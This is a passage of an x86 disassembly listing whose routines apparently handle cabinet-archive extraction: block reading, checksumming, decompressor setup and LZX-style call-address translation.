loc_1003DEC: ; CODE XREF: sub_1003D05+8F�j
xor eax, eax
loc_1003DEE: ; CODE XREF: sub_1003D05+DA�j
pop edi
pop esi
pop ebx
retn 8
sub_1003D05 endp
; =============== S U B R O U T I N E =======================================
sub_1003DF4 proc near ; CODE XREF: sub_1003F1F+1C�p
; sub_1003F1F+43�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
push ecx
push ebx
push ebp
push esi
mov esi, [esp+10h+arg_0]
mov bx, [esi+72h]
xor eax, eax
mov ax, [esi+70h]
push edi
lea edi, [esi+7BCh]
lea ecx, [esi+3B7h]
mov [edi+4], ecx
lea ecx, [esi+4B8h]
mov [edi+8], ecx
lea ecx, [esi+5B9h]
inc bx
mov [edi+0Ch], ecx
mov ecx, [esi+38h]
and dword ptr [edi+24h], 0
mov [esp+14h+var_4], eax
mov [edi+10h], ecx
mov [edi+1Eh], ax
mov [edi+20h], bx
loc_1003E40: ; CODE XREF: sub_1003DF4+D5�j
mov eax, [esi+84h]
and [esp+14h+arg_0], 0
cmp eax, 0FFFFFFFFh
jz short loc_1003E59
push eax
call dword ptr [esi+18h]
test eax, eax
pop ecx
jnz short loc_1003ED8
loc_1003E59: ; CODE XREF: sub_1003DF4+5A�j
lea ebp, [esi+88h]
mov eax, [ebp+0]
cmp eax, 0FFFFFFFFh
jz short loc_1003E70
push eax
call dword ptr [esi+18h]
test eax, eax
pop ecx
jnz short loc_1003ED8
loc_1003E70: ; CODE XREF: sub_1003DF4+71�j
or dword ptr [ebp+0], 0FFFFFFFFh
or dword ptr [esi+84h], 0FFFFFFFFh
push edi
push 4
call dword ptr [esi+24h]
cmp eax, 0FFFFFFFFh
pop ecx
pop ecx
jz short loc_1003EE7
push ebx
push [esp+18h+var_4]
lea eax, [esi+3B7h]
push eax
push esi
call sub_10039B0
test eax, eax
jz short loc_1003EAA
push 0
push esi
call sub_1003D05
test eax, eax
jnz short loc_1003EBA
loc_1003EAA: ; CODE XREF: sub_1003DF4+A8�j
mov eax, [esi]
cmp dword ptr [eax], 0Bh
jz short loc_1003EE3
xor ebp, ebp
inc ebp
mov [esp+14h+arg_0], ebp
jmp short loc_1003EBD
; ---------------------------------------------------------------------------
loc_1003EBA: ; CODE XREF: sub_1003DF4+B4�j
xor ebp, ebp
inc ebp
loc_1003EBD: ; CODE XREF: sub_1003DF4+C4�j
cmp [esp+14h+arg_0], 0
mov eax, [esi]
mov eax, [eax]
mov [edi+24h], eax
jnz loc_1003E40
inc word ptr [esi+0AEh]
jmp short loc_1003F05
; ---------------------------------------------------------------------------
loc_1003ED8: ; CODE XREF: sub_1003DF4+63�j
; sub_1003DF4+7A�j
push 0
push 4
loc_1003EDC: ; CODE XREF: sub_1003DF4+F7�j
push dword ptr [esi]
call sub_1004350
loc_1003EE3: ; CODE XREF: sub_1003DF4+BB�j
; sub_1003DF4+10F�j
xor eax, eax
jmp short loc_1003F17
; ---------------------------------------------------------------------------
loc_1003EE7: ; CODE XREF: sub_1003DF4+92�j
push 0
push 0Bh
jmp short loc_1003EDC
; ---------------------------------------------------------------------------
loc_1003EED: ; CODE XREF: sub_1003DF4+119�j
dec word ptr [esi+0ACh]
dec word ptr [esi+0AEh]
push esi
call sub_1003C74
test eax, eax
jz short loc_1003EE3
loc_1003F05: ; CODE XREF: sub_1003DF4+E2�j
cmp word ptr [esi+0AEh], 0
jnz short loc_1003EED
mov [esi+9Ch], ebp
mov eax, ebp
loc_1003F17: ; CODE XREF: sub_1003DF4+F1�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn 4
sub_1003DF4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1003F1F proc near ; CODE XREF: sub_1003FC0+48�p
; sub_1004021+37�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
mov eax, [esi+48h]
movzx eax, word ptr [eax+6]
add [esi+30h], eax
cmp word ptr [esi+0B0h], 0
jnz short loc_1003F44
push esi
call sub_1003DF4
test eax, eax
jz short loc_1003FB4
loc_1003F44: ; CODE XREF: sub_1003F1F+19�j
dec word ptr [esi+0B0h]
push 0
push esi
call sub_10033BE
test eax, eax
jz short loc_1003FB4
mov eax, [esi+48h]
cmp word ptr [eax+6], 0
jnz short loc_1003F84
push esi
call sub_1003DF4
test eax, eax
jz short loc_1003FB4
mov eax, [esi+48h]
movzx eax, word ptr [eax+4]
push eax
push esi
call sub_10033BE
test eax, eax
jz short loc_1003FB4
dec word ptr [esi+0B0h]
loc_1003F84: ; CODE XREF: sub_1003F1F+40�j
mov eax, [esi+48h]
movzx eax, word ptr [eax+6]
mov [ebp+arg_0], eax
lea eax, [ebp+arg_0]
push eax
push esi
call sub_10038B1
test eax, eax
jz short loc_1003FB4
mov eax, [esi+48h]
mov cx, word ptr [ebp+arg_0]
cmp cx, [eax+6]
jz short loc_1003FB8
push 0
push 7
push dword ptr [esi]
call sub_1004350
loc_1003FB4: ; CODE XREF: sub_1003F1F+23�j
; sub_1003F1F+36�j ...
xor eax, eax
jmp short loc_1003FBB
; ---------------------------------------------------------------------------
loc_1003FB8: ; CODE XREF: sub_1003F1F+88�j
xor eax, eax
inc eax
loc_1003FBB: ; CODE XREF: sub_1003F1F+97�j
pop esi
pop ebp
retn 4
sub_1003F1F endp
; =============== S U B R O U T I N E =======================================
sub_1003FC0 proc near ; CODE XREF: sub_1004021+2F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push edi
mov edi, [esp+4+arg_0]
cmp dword ptr [edi+9Ch], 0
jz short loc_1003FD3
xor eax, eax
inc eax
jmp short loc_100401D
; ---------------------------------------------------------------------------
loc_1003FD3: ; CODE XREF: sub_1003FC0+C�j
push esi
mov esi, [esp+8+arg_4]
mov eax, 0FFFEh
mov ecx, esi
and ecx, eax
cmp ecx, eax
jnz short loc_1003FEA
movzx esi, word ptr [edi+6Ah]
dec esi
loc_1003FEA: ; CODE XREF: sub_1003FC0+23�j
cmp [edi+90h], esi
jz short loc_1004019
push edi
call sub_1003850
test eax, eax
jz short loc_1004011
push esi
push edi
call sub_1003D05
test eax, eax
jz short loc_1004011
push edi
call sub_1003F1F
test eax, eax
jnz short loc_1004015
loc_1004011: ; CODE XREF: sub_1003FC0+3A�j
; sub_1003FC0+45�j
xor eax, eax
jmp short loc_100401C
; ---------------------------------------------------------------------------
loc_1004015: ; CODE XREF: sub_1003FC0+4F�j
and dword ptr [edi+30h], 0
loc_1004019: ; CODE XREF: sub_1003FC0+30�j
xor eax, eax
inc eax
loc_100401C: ; CODE XREF: sub_1003FC0+53�j
pop esi
loc_100401D: ; CODE XREF: sub_1003FC0+11�j
pop edi
retn 8
sub_1003FC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1004021 proc near ; CODE XREF: sub_1004170+169�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_0]
mov eax, [esi+74h]
test eax, eax
push edi
jz loc_10040DC
mov ebx, [esi+78h]
cmp ebx, [esi+30h]
mov [ebp+arg_0], eax
jnb short loc_100404A
mov dword ptr [esi+90h], 0FFFFh
loc_100404A: ; CODE XREF: sub_1004021+1D�j
movzx eax, word ptr [esi+7Ch]
push eax
push esi
call sub_1003FC0
jmp short loc_100405D
; ---------------------------------------------------------------------------
loc_1004057: ; CODE XREF: sub_1004021+4C�j
push esi
call sub_1003F1F
loc_100405D: ; CODE XREF: sub_1004021+34�j
test eax, eax
jz short loc_10040C0
mov eax, [esi+48h]
movzx eax, word ptr [eax+6]
add eax, [esi+30h]
cmp ebx, eax
jnb short loc_1004057
cmp [ebp+arg_0], 0
jz short loc_10040DC
loc_1004075: ; CODE XREF: sub_1004021+90�j
mov ecx, [esi+48h]
movzx edi, word ptr [ecx+6]
mov eax, ebx
sub eax, [esi+30h]
sub edi, eax
cmp edi, [ebp+arg_0]
jbe short loc_100408B
mov edi, [ebp+arg_0]
loc_100408B: ; CODE XREF: sub_1004021+65�j
mov ecx, [esi+40h]
push edi
add ecx, eax
push ecx
push dword ptr [esi+8Ch]
call dword ptr [esi+14h]
add esp, 0Ch
cmp edi, eax
jnz short loc_10040B5
add ebx, edi
sub [ebp+arg_0], edi
jz short loc_10040DC
push esi
call sub_1003F1F
test eax, eax
jnz short loc_1004075
jmp short loc_10040C0
; ---------------------------------------------------------------------------
loc_10040B5: ; CODE XREF: sub_1004021+7F�j
push 0
push 8
push dword ptr [esi]
call sub_1004350
loc_10040C0: ; CODE XREF: sub_1004021+3E�j
; sub_1004021+92�j
lea edi, [esi+8Ch]
mov eax, [edi]
cmp eax, 0FFFFFFFFh
jz short loc_10040D5
push eax
call dword ptr [esi+18h]
or dword ptr [edi], 0FFFFFFFFh
pop ecx
loc_10040D5: ; CODE XREF: sub_1004021+AA�j
; sub_1004021+138�j
xor eax, eax
jmp loc_1004169
; ---------------------------------------------------------------------------
loc_10040DC: ; CODE XREF: sub_1004021+E�j
; sub_1004021+52�j ...
lea eax, [esi+7BCh]
lea ecx, [esi+0B4h]
mov [eax+4], ecx
mov ecx, [esi+8Ch]
mov [eax+14h], ecx
mov cx, [esi+7Eh]
mov [eax+18h], cx
mov cx, [esi+80h]
mov [eax+1Ah], cx
mov cx, [esi+82h]
mov [eax+1Ch], cx
mov ecx, [esi+38h]
mov [eax+10h], ecx
mov cx, [esi+7Ch]
and dword ptr [eax], 0
xor edi, edi
mov [eax+22h], cx
mov cx, [eax+1Ch]
inc edi
test cl, 40h
jz short loc_100413A
and cx, 0FFBFh
mov [eax], edi
mov [eax+1Ch], cx
loc_100413A: ; CODE XREF: sub_1004021+10C�j
push eax
push 3
call dword ptr [esi+24h]
or dword ptr [esi+8Ch], 0FFFFFFFFh
cmp eax, 0FFFFFFFFh
pop ecx
pop ecx
jnz short loc_100415E
push 0
push 0Bh
loc_1004152: ; CODE XREF: sub_1004021+144�j
push dword ptr [esi]
call sub_1004350
jmp loc_10040D5
; ---------------------------------------------------------------------------
loc_100415E: ; CODE XREF: sub_1004021+12B�j
test eax, eax
jnz short loc_1004167
push eax
push 8
jmp short loc_1004152
; ---------------------------------------------------------------------------
loc_1004167: ; CODE XREF: sub_1004021+13F�j
mov eax, edi
loc_1004169: ; CODE XREF: sub_1004021+B6�j
pop edi
pop esi
pop ebx
pop ebp
retn 4
sub_1004021 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1004170 proc near ; CODE XREF: start_0+2FB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_18]
push ebx
push esi
mov esi, [ebp+arg_0]
mov [esi+38h], eax
mov eax, [ebp+arg_10]
mov [esi+24h], eax
mov eax, [ebp+arg_14]
xor edx, edx
mov [esi+28h], eax
mov eax, [ebp+arg_8]
mov ecx, esi
sub ecx, eax
push edi
mov [ebp+var_4], edx
lea edi, [esi+7BCh]
mov [esi+0AEh], dx
lea ebx, [ecx+5B9h]
loc_10041AB: ; CODE XREF: sub_1004170+43�j
mov cl, [eax]
mov [ebx+eax], cl
inc eax
test cl, cl
jnz short loc_10041AB
push 0FFFFh
push edx
push [ebp+arg_4]
push esi
call sub_10039B0
test eax, eax
jz loc_100431D
and dword ptr [esi+9Ch], 0
mov eax, [ebp+arg_8]
mov dword ptr [esi+90h], 0FFFFh
loc_10041E0: ; CODE XREF: sub_1004170+78�j
mov cl, [eax]
mov [ebx+eax], cl
inc eax
test cl, cl
jnz short loc_10041E0
push esi
call sub_1003577
test eax, eax
jz loc_100431D
xor ebx, ebx
jmp loc_1004302
; ---------------------------------------------------------------------------
loc_10041FF: ; CODE XREF: sub_1004170+182�j
; sub_1004170+199�j
dec word ptr [esi+0ACh]
push esi
call sub_1003C74
test eax, eax
jz loc_100431D
lea eax, [esi+0B4h]
mov [edi+4], eax
mov eax, [esi+74h]
mov [edi], eax
lea eax, [esi+1B5h]
mov [edi+8], eax
lea eax, [esi+2B6h]
mov [edi+0Ch], eax
mov ax, [esi+7Eh]
mov [edi+18h], ax
mov ax, [esi+80h]
mov [edi+1Ah], ax
mov ax, [esi+82h]
mov [edi+1Ch], ax
mov eax, [esi+38h]
mov [edi+10h], eax
mov ax, [esi+7Ch]
mov [edi+22h], ax
mov ax, [esi+7Ch]
and ax, 0FFFDh
cmp ax, 0FFFDh
jnz short loc_10042A9
cmp [esi+9Ch], ebx
push edi
jnz short loc_10042C2
push 1
call [ebp+arg_10]
cmp eax, 0FFFFFFFFh
pop ecx
pop ecx
jnz short loc_10042EB
loc_1004283: ; CODE XREF: sub_1004170+162�j
push ebx
push 0Bh
push dword ptr [esi]
call sub_1004350
jmp loc_100431D
; ---------------------------------------------------------------------------
loc_1004292: ; CODE XREF: sub_1004170+166�j
mov ax, [esi+7Ch]
and ax, 0FFFEh
cmp ax, 0FFFEh
jnz short loc_10042EB
inc word ptr [esi+0AEh]
jmp short loc_10042EB
; ---------------------------------------------------------------------------
loc_10042A9: ; CODE XREF: sub_1004170+FC�j
cmp [esi+9Ch], ebx
jnz short loc_10042E4
mov ax, [edi+22h]
cmp ax, [esi+6Ah]
jb short loc_10042C1
cmp ax, 0FFFCh
jb short loc_10042EB
loc_10042C1: ; CODE XREF: sub_1004170+149�j
push edi
loc_10042C2: ; CODE XREF: sub_1004170+105�j
push 2
call [ebp+arg_10]
cmp eax, 0FFFFFFFFh
pop ecx
pop ecx
mov [esi+8Ch], eax
jz short loc_1004283
cmp eax, ebx
jz short loc_1004292
push esi
call sub_1004021
test eax, eax
jz short loc_100431D
jmp short loc_10042EB
; ---------------------------------------------------------------------------
loc_10042E4: ; CODE XREF: sub_1004170+13F�j
mov [esi+0ACh], bx
loc_10042EB: ; CODE XREF: sub_1004170+111�j
; sub_1004170+12E�j ...
cmp [esi+0ACh], bx
jnz loc_10041FF
push esi
call sub_1003577
test eax, eax
jz short loc_100431D
loc_1004302: ; CODE XREF: sub_1004170+8A�j
cmp [esi+0ACh], bx
jnz loc_10041FF
dec word ptr [esi+0ACh]
mov [ebp+var_4], 1
loc_100431D: ; CODE XREF: sub_1004170+56�j
; sub_1004170+82�j ...
mov eax, [esi+88h]
or ebx, 0FFFFFFFFh
cmp eax, ebx
jz short loc_100432F
push eax
call dword ptr [esi+18h]
pop ecx
loc_100432F: ; CODE XREF: sub_1004170+1B8�j
lea edi, [esi+84h]
mov eax, [edi]
cmp eax, ebx
jz short loc_1004340
push eax
call dword ptr [esi+18h]
pop ecx
loc_1004340: ; CODE XREF: sub_1004170+1C9�j
mov eax, [ebp+var_4]
mov [edi], ebx
pop edi
mov [esi+88h], ebx
pop esi
pop ebx
leave
retn
sub_1004170 endp
; =============== S U B R O U T I N E =======================================
sub_1004350 proc near ; CODE XREF: sub_1003202+1B�p
; sub_1003292+38�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
mov ecx, [esp+arg_4]
mov [eax], ecx
mov ecx, [esp+arg_8]
mov [eax+4], ecx
mov dword ptr [eax+8], 1
retn 0Ch
sub_1004350 endp
; =============== S U B R O U T I N E =======================================
sub_100436B proc near ; CODE XREF: sub_10033BE+7F�p
; sub_10033BE+96�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_0]
push esi
mov esi, [esp+4+arg_4]
mov eax, esi
shr eax, 2
test eax, eax
push edi
mov edi, [esp+8+arg_8]
jle short loc_10043A6
push ebx
loc_1004383: ; CODE XREF: sub_100436B+38�j
movzx edx, byte ptr [ecx]
xor ebx, ebx
inc ecx
mov bh, [ecx]
or edx, ebx
inc ecx
movzx ebx, byte ptr [ecx]
shl ebx, 10h
or edx, ebx
inc ecx
movzx ebx, byte ptr [ecx]
shl ebx, 18h
or edx, ebx
inc ecx
xor edi, edx
dec eax
jnz short loc_1004383
pop ebx
loc_10043A6: ; CODE XREF: sub_100436B+15�j
and esi, 3
xor eax, eax
dec esi
jz short loc_10043C2
dec esi
jz short loc_10043BB
dec esi
jnz short loc_10043C7
movzx eax, byte ptr [ecx]
shl eax, 10h
inc ecx
loc_10043BB: ; CODE XREF: sub_100436B+44�j
xor edx, edx
mov dh, [ecx]
or eax, edx
inc ecx
loc_10043C2: ; CODE XREF: sub_100436B+41�j
movzx ecx, byte ptr [ecx]
or eax, ecx
loc_10043C7: ; CODE XREF: sub_100436B+47�j
xor eax, edi
pop edi
pop esi
retn 0Ch
sub_100436B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10043CE proc near ; CODE XREF: sub_100368F+66�p
; sub_100368F+133�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov eax, [eax]
mov ecx, [ebp+arg_10]
add eax, 1800h
mov [ecx], eax
mov eax, [ebp+arg_14]
test eax, eax
jnz short loc_10043E9
pop ebp
retn
; ---------------------------------------------------------------------------
loc_10043E9: ; CODE XREF: sub_10043CE+17�j
and dword ptr [eax], 0
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
push 2Ch
call edi
mov esi, eax
test esi, esi
pop ecx
jnz short loc_1004405
loc_10043FD: ; CODE XREF: sub_10043CE+AE�j
xor eax, eax
inc eax
jmp loc_1004488
; ---------------------------------------------------------------------------
loc_1004405: ; CODE XREF: sub_10043CE+2D�j
push 2EFCh
call edi
test eax, eax
pop ecx
mov [ebp+arg_10], eax
mov [esi+28h], eax
jnz short loc_100441D
push esi
call [ebp+arg_C]
jmp short loc_100447B
; ---------------------------------------------------------------------------
loc_100441D: ; CODE XREF: sub_10043CE+47�j
push [ebp+arg_28]
mov eax, [ebp+arg_1C]
push [ebp+arg_24]
mov edx, [ebp+arg_18]
push [ebp+arg_20]
mov ebx, [ebp+arg_C]
push [ebp+arg_1C]
mov ecx, [ebp+arg_4]
mov [esi+10h], eax
mov eax, [ebp+arg_20]
mov [esi+14h], eax
mov eax, [ebp+arg_24]
mov [esi+18h], eax
mov eax, [ebp+arg_28]
mov [esi+1Ch], eax
mov eax, [ebp+arg_0]
mov [esi+4], edi
mov [esi+8], ebx
mov [esi+0Ch], edx
mov eax, [eax]
push edx
push ebx
mov [esi+20h], eax
mov eax, [ecx+4]
push edi
mov [esi+24h], eax
mov dword ptr [esi], 4349444Ch
push dword ptr [ecx]
push [ebp+arg_10]
call sub_10045A6
test eax, eax
jnz short loc_1004481
push esi
call ebx
loc_100447B: ; CODE XREF: sub_10043CE+4D�j
pop ecx
jmp loc_10043FD
; ---------------------------------------------------------------------------
loc_1004481: ; CODE XREF: sub_10043CE+A8�j
mov eax, [ebp+arg_14]
mov [eax], esi
xor eax, eax
loc_1004488: ; CODE XREF: sub_10043CE+32�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_10043CE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100448D proc near ; CODE XREF: sub_10038B1+56�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
and [ebp+var_4], 0
cmp dword ptr [ecx], 4349444Ch
jz short loc_10044A5
push 2
pop eax
leave
retn
; ---------------------------------------------------------------------------
loc_10044A5: ; CODE XREF: sub_100448D+11�j
push esi
mov esi, [ebp+arg_10]
mov eax, [esi]
cmp eax, [ecx+20h]
jbe short loc_10044B5
push 3
pop eax
jmp short loc_10044D8
; ---------------------------------------------------------------------------
loc_10044B5: ; CODE XREF: sub_100448D+21�j
lea edx, [ebp+var_4]
push edx
push eax
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
push dword ptr [ecx+28h]
call sub_100454A
mov ecx, [ebp+var_4]
neg eax
sbb eax, eax
mov [esi], ecx
and eax, 4
loc_10044D8: ; CODE XREF: sub_100448D+26�j
pop esi
leave
retn
sub_100448D endp
; =============== S U B R O U T I N E =======================================
sub_10044DB proc near ; CODE XREF: sub_1003850+36�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp dword ptr [eax], 4349444Ch
jz short loc_10044EB
push 2
pop eax
retn
; ---------------------------------------------------------------------------
loc_10044EB: ; CODE XREF: sub_10044DB+A�j
push dword ptr [eax+28h]
call sub_1004528
xor eax, eax
retn
sub_10044DB endp
; =============== S U B R O U T I N E =======================================
sub_10044F6 proc near ; CODE XREF: sub_1003620+36�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
cmp dword ptr [esi], 4349444Ch
jz short loc_1004508
push 2
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_1004508: ; CODE XREF: sub_10044F6+B�j
push dword ptr [esi+28h]
call sub_1004523
push dword ptr [esi+28h]
and dword ptr [esi], 0
call dword ptr [esi+8]
push esi
call dword ptr [esi+8]
pop ecx
pop ecx
xor eax, eax
pop esi
retn
sub_10044F6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_1004523 proc near ; CODE XREF: sub_10044F6+15�p
jmp sub_100466D
sub_1004523 endp
; =============== S U B R O U T I N E =======================================
sub_1004528 proc near ; CODE XREF: sub_10044DB+13�p
; sub_10045A6+65�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push esi
call sub_1004687
push esi
call sub_10046F6
push esi
call sub_100473B
and dword ptr [esi+2ECCh], 0
pop esi
retn 4
sub_1004528 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100454A proc near ; CODE XREF: sub_100448D+3A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
mov eax, [ebp+arg_8]
mov ecx, [ebp+arg_C]
push esi
mov esi, [ebp+arg_0]
mov [esi+2B04h], eax
lea eax, [eax+ecx+4]
mov [esi+2B08h], eax
mov eax, [ebp+arg_10]
push esi
mov [esi+2B0Ch], eax
call sub_1004A5C
push [ebp+arg_4]
push esi
call sub_10047F7
inc dword ptr [esi+2ECCh]
test eax, eax
jge short loc_1004594
mov eax, [ebp+arg_18]
and dword ptr [eax], 0
xor eax, eax
inc eax
jmp short loc_10045A1
; ---------------------------------------------------------------------------
loc_1004594: ; CODE XREF: sub_100454A+3D�j
mov ecx, [ebp+arg_18]
mov [ecx], eax
add [esi+2B10h], eax
xor eax, eax
loc_10045A1: ; CODE XREF: sub_100454A+48�j
pop esi
pop ebp
retn 1Ch
sub_100454A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10045A6 proc near ; CODE XREF: sub_10043CE+A1�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
mov eax, [ebp+arg_8]
push esi
mov esi, [ebp+arg_0]
mov [esi+2EE0h], eax
mov eax, [ebp+arg_C]
mov [esi+2EE4h], eax
mov eax, [ebp+arg_10]
mov [esi+2EE8h], eax
mov eax, [ebp+arg_14]
mov [esi+2EECh], eax
mov eax, [ebp+arg_18]
mov [esi+2EF0h], eax
mov eax, [ebp+arg_1C]
mov [esi+2EF4h], eax
mov eax, [ebp+arg_20]
mov [esi+2EF8h], eax
mov eax, [ebp+arg_4]
lea ecx, [eax-1]
test ecx, eax
mov [esi+4], eax
mov [esi+8], ecx
jnz short loc_1004606
push esi
call sub_1004618
test eax, eax
jnz short loc_100460A
loc_1004606: ; CODE XREF: sub_10045A6+54�j
xor eax, eax
jmp short loc_1004613
; ---------------------------------------------------------------------------
loc_100460A: ; CODE XREF: sub_10045A6+5E�j
push esi
call sub_1004528
xor eax, eax
inc eax
loc_1004613: ; CODE XREF: sub_10045A6+62�j
pop esi
pop ebp
retn 24h
sub_10045A6 endp
; =============== S U B R O U T I N E =======================================
sub_1004618 proc near ; CODE XREF: sub_10045A6+57�p
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
mov edx, [esi+4]
push edi
push 4
mov byte ptr [esi+2EB5h], 4
pop edi
loc_100462C: ; CODE XREF: sub_1004618+34�j
mov al, [esi+2EB5h]
movzx ecx, al
mov cl, ds:byte_1001278[ecx]
xor ebx, ebx
inc ebx
shl ebx, cl
add edi, ebx
inc al
cmp edi, edx
mov [esi+2EB5h], al
jb short loc_100462C
add edx, 105h
push edx
call dword ptr [esi+2EE0h]
pop ecx
xor ecx, ecx
test eax, eax
setnz cl
pop edi
mov [esi], eax
pop esi
pop ebx
mov eax, ecx
retn 4
sub_1004618 endp
; =============== S U B R O U T I N E =======================================
sub_100466D proc near ; CODE XREF: sub_1004523�j
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi]
test eax, eax
jz short loc_1004683
push eax
call dword ptr [esi+2EE4h]
and dword ptr [esi], 0
pop ecx
loc_1004683: ; CODE XREF: sub_100466D+9�j
pop esi
retn 4
sub_100466D endp
; =============== S U B R O U T I N E =======================================
sub_1004687 proc near ; CODE XREF: sub_1004528+6�p
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
movzx ecx, byte ptr [edx+2EB5h]
lea ecx, ds:100h[ecx*8]
push esi
push edi
mov esi, ecx
shr ecx, 2
xor eax, eax
lea edi, [edx+0A18h]
rep stosd
mov ecx, esi
and ecx, 3
rep stosb
movzx ecx, byte ptr [edx+2EB5h]
lea ecx, ds:100h[ecx*8]
mov esi, ecx
shr ecx, 2
xor eax, eax
lea edi, [edx+2B14h]
rep stosd
mov ecx, esi
and ecx, 3
rep stosb
push 3Eh
pop ecx
xor eax, eax
lea edi, [edx+0CB8h]
rep stosd
stosb
push 3Eh
pop ecx
xor eax, eax
lea edi, [edx+2DB4h]
rep stosd
stosb
pop edi
pop esi
retn 4
sub_1004687 endp
; =============== S U B R O U T I N E =======================================
sub_10046F6 proc near ; CODE XREF: sub_1004528+C�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
xor edx, edx
xor ecx, ecx
inc ecx
mov [eax+0Ch], ecx
mov [eax+10h], ecx
mov [eax+14h], ecx
mov [eax+2EC0h], edx
mov [eax+2B10h], edx
mov [eax+2EDCh], ecx
mov [eax+2ED4h], edx
mov [eax+2ED8h], edx
mov [eax+2EB8h], ecx
mov [eax+2EC4h], edx
mov [eax+2EBCh], edx
retn 4
sub_10046F6 endp
; =============== S U B R O U T I N E =======================================
sub_100473B proc near ; CODE XREF: sub_1004528+12�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
and dword ptr [eax+2EC8h], 0
retn 4
sub_100473B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1004749 proc near ; CODE XREF: sub_1005720+44�p
var_8 = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
mov edx, [ebp+arg_8]
cmp edx, 6
jg short loc_1004764
mov eax, [ebp+arg_0]
add [eax+2EC8h], edx
jmp locret_10047F3
; ---------------------------------------------------------------------------
loc_1004764: ; CODE XREF: sub_1004749+B�j
mov ecx, [ebp+arg_4]
push ebx
push esi
lea ebx, [ecx+edx]
push edi
mov [ebp+arg_8], ebx
add ebx, 0FFFFFFFAh
mov esi, ebx
lea edi, [ebp+var_8]
movsd
movsw
mov eax, 0E8E8E8E8h
mov edi, ebx
stosd
stosw
mov eax, [ebp+arg_0]
mov esi, [eax+2EC8h]
lea edx, [esi+edx-0Ah]
mov [ebp+arg_0], edx
jmp short loc_100479E
; ---------------------------------------------------------------------------
loc_1004797: ; CODE XREF: sub_1004749+58�j
inc ecx
inc dword ptr [eax+2EC8h]
loc_100479E: ; CODE XREF: sub_1004749+4C�j
; sub_1004749+90�j
cmp byte ptr [ecx], 0E8h
jnz short loc_1004797
mov edi, [eax+2EC8h]
inc ecx
cmp edi, edx
jnb short loc_10047DB
mov edx, [ecx]
mov esi, [eax+2EC4h]
cmp edx, esi
jnb short loc_10047C0
sub edx, edi
mov [ecx], edx
jmp short loc_10047CC
; ---------------------------------------------------------------------------
loc_10047C0: ; CODE XREF: sub_1004749+6F�j
mov ebx, edx
neg ebx
cmp ebx, edi
ja short loc_10047CC
add esi, edx
mov [ecx], esi
loc_10047CC: ; CODE XREF: sub_1004749+75�j
; sub_1004749+7D�j
mov edx, [ebp+arg_0]
add ecx, 4
add dword ptr [eax+2EC8h], 5
jmp short loc_100479E
; ---------------------------------------------------------------------------
loc_10047DB: ; CODE XREF: sub_1004749+63�j
mov edi, [ebp+arg_8]
add edx, 0Ah
add edi, 0FFFFFFFAh
mov [eax+2EC8h], edx
lea esi, [ebp+var_8]
movsd
movsw
pop edi
pop esi
pop ebx
locret_10047F3: ; CODE XREF: sub_1004749+16�j
leave
retn 0Ch
sub_1004749 endp
; =============== S U B R O U T I N E =======================================
sub_10047F7 proc near ; CODE XREF: sub_100454A+30�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ecx
push ebx
